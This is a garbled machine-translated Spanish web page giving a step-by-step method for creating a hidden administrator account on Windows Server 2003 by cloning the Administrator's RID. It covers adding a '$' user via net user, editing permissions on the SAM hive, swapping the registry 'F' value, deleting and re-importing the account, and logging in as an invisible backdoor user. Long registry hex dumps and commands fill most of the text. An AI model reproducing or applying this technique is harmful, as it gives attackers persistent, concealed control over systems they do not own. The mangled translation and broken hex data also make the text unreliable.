Métodos ventanas 2003

  
windows desbloqueo cuenta oculta 2003 se convirtió en la cuenta oculta al aterrizar después de 3389 - el primer usuario para establecer cnlnfjhh $ c: \\ > neta cnlnfjhh usuario $ wrsky /agregar //volver más $ de usar neto en la consola usuario no puede ver a continuación, ejecute Regedt32.exe (Nota no regedit.exe) para encontrar HKEY_LOCAL_MAICHINE \\ SAM \\ SAM haga clic en él, a continuación, el menú " seguridad " - la adición de cuenta de su nombre de usuario actual o;. > " derechos " grupo, el " autoridad " - > " control total " - > " permitido " marca de verificación, a continuación, determinar lo tanto puede leer información sobre el sam local, ahora dirigido regedit.exe abierta HKEY_LOCAL_MAICHINE \\ llave. SAM \\ SAM \\ domains \\ cuenta \\ usuario \\ nombre \\ cnlnfjhh $ ver la clave predeterminada " 0x3f1 " que corresponde a exportar la cuenta siguiente \\ usuario \\ nombres HKEY_LOCAL_MAICHINE \\ SAM \\ SAM \\ domains \\ \\ cnlnfjhh $ es cnlnfjhh $ .reg HKEY_LOCAL_MACHINE \\ SAM \\ SAM \\ Domains \\ cuenta \\ Users \\ 000003F1 se 3f1.reg HKEY_LOCAL_MACHINE \\ SAM \\ SAM \\ Domains \\ cuenta \\ Users \\ 000001F4 se lf4.reg (Administradores de la tecla correspondiente) con la libreta abierta lf4.reg Se han encontrado por debajo de " F " valor, como en este ejemplo " F " = hex: 02,00,01,00,00,00,00,00,00,00,00,00,00,00, 00,00,00,00,00,00,00,00,00, \\ 00,20,97, b7,13,99,50, c2,01, ff, ff, ff, ff, ff, ff, ff , 7f, 40,6e, 43,73,9f, 50, c2,01, \\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00, 00,01,00,00,00,01,00,00,00,00, \\ 00,00,00,00,00,00,00 Después de copiarlo, abra 3f1.reg y busque " F " valor, borrar, y luego pegar el período anterior. abrir Red PEA $ reg, el interior del contenido, como este ejemplo, esta copia los siguientes [HKEY_LOCAL_MACHINE \\ SAM \\ SAM \\ Domains \\ cuenta \\ Users \\ \\ Nombres cnlnfjhh $] @ = hex (3f1): Volver 3f1.reg pegar el párrafo anterior al documento final, el documento final como el contenido generado por el Editor del Registro de Windows versión 5.00 [HKEY_LOCAL_MACHINE \\ SAM \\ SAM \\ Domains \\ cuenta \\ Users \\ 000003F1] " F "= hex": 02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 , \\ 00,20,97, b7,13,99,50, c2,01, ff, ff, ff, ff, ff, ff, ff, 7f, 40,6e, 43,73,9f, 50, c2, 01, \\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,0 0,00,00, \\ 00,00,00,00,00,00 " V " = hex: 00,00,00,00, d4,00,00,00,02,00,01,00 , d4,00,00,00,1a, 00,00,00,00,00,00, \\ 00, f0,00,00,00,00,00,00,00,00,00,00, 00,01,00,00,12,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 € , 01,00,00,00,00,00,00,00,00,00,00,14, \\ 01,00,00,00,00,00,00,00,00,00,14, 01,00,00,00,00,00,00,00,00,00,00,14,01, \\ 00,00,00,00,00,00,00,00,00,14,01 , 00,00,00,00,00,00,00,00,00,00,14,01,00, \\ 00,00,00,00,00,00,00,00,14,01, 00,00,15,00,00,00, a8,00,00,00,2c, 01,00,00, \\ 08,00,00,00,01,00,00,00,34,01,00 , 00,14,00,00,00,00,00,00,00,48,01,00,00,14, \\ 00,00,00,00,00,00,00,5c, 01,00, 00,04,00,00,00,00,00,00,00,60,0,0,00,00,00,04,00 \\ 00,00,00,00,00,00,00,00,00,00,00 € , b4,00,00,00, c4,00,00,00,14,00,00,00,44,00,00, \\ 00,02,00,30,00,02,00,00,00, 02, c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01, \\ 00,00,00,00,02, c0,14,00, ff , 07,0f, 00,01,01,00,00,00,00,00,05,07,00,00,00,02, \\ 00,70,00,04,00,00,00,00, 00,14,00,1b, 03,02,00,01,01,00,00,00,00,00,01,00,00, \\ 00,00,00,00,18,00, ff, 07 , 0f, 00, 01, 02,00,00,00,00,00,05,20,00,00,00,20,02,00, \\ 00,00,00,18,00, ff, 07,0f, 00,01,02 , 00,00,00,00,00,05,20,00,00,00,24,02,00,00, \\ 00,00,24,00,04,00,02,00,01,05, 00,00,00,00,00,05,15,00,00,00, b4, b7, cd, 22, dd, \\ e8, e4,1c, ser, 04,3e, 32, e8,03,00 , 00,01,02,00,00,00,00,00,0,0,20,00,00,00,00,20,02, \\ 00,00,01,02,00,00,00,00,00, 05,20,00,00,00,20,02,00,00,48,00,65,00,6c, 00,70, \\ 00,41,00,73,00,73,00,69,00 , 73,00,74,00,61,00,6e, 00,74,00,00,00, dc, 8f, 0b, 7a, \\ 4c, 68,62,97, a9,52,4b, 62, 10,5e, 37,62, d0,63,9b, 4f, cc, 8f, 0b, 7a, 4f, 53, a9,52,84, \\ 76,10,5e, 37,62,01,00, ff , ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, \\ ff, ff, ff, 88, d7, f1,01, 02,00,00,07,00,00,00,01,00,01,00, db, 57, a2,94, f8,41,63, \\ fa, 2c, 88, d7, f1, cd, 99 , cf, 0d, 01,00,01,00, a0,05,70,54, f3,45,3e, 4a, 64,95, ef, 6c, \\ 37, f1,02, cf, 01,00, 01,00,01,00,01,00 [HKEY_LOCAL_MACHINE \\ SAM \\ SAM \\ Domains \\ cuenta \\ users \\ Names \\ cnlnfjhh $] @ = hex (3f1): después del almacenamiento, el usuario cnlnfjhh $ borra c: \\ > net Usuario cnlnfjhh $ /delete Ejecute regedit.exe para importar nuestro archivo 3f1.reg modificado. Finalmente, abra regedt32.exe encontrar HKEY_LOCAL_MAICHINE \\ SAM \\ SAM haga clic en él, a continuación, el menú " seguridad " - > " derechos " eliminar la cuenta que acaba de añadir y luego cerrar la sesión del usuario actual con cnlnfjhh de aterrizaje /wrsky será la máxima autoridad de 03. el método de clonación de clon de una ligera diferencia entre el punto y 2000 es que la primera parte de este artículo voy a configurar una consola con un usuario y " red, gestión de " equipo; son invisibles cuenta cnlnfjhh $, recuerde primero Establezca la contraseña de nuevo, no cambie la contraseña.
Copyright © Conocimiento de Windows All Rights Reserved